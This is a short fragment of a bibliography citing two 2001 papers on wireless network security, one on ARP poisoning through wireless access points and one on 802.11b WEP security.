3 Bob Fleck and Jordan Dimov. "Wireless Access Points and ARP Poisoning." http://www.cigitallabs.com/resources/papers/download/arppoison.pdf. December 2001.
4 Wireless Ethernet Compatibility Alliance. "802.11b Wired Equivalent Privacy (WEP) Security." February 19, 2001. http://www.wi-fi.net/pdf/Wi-FiWEPSecurity.pdf. December 2001.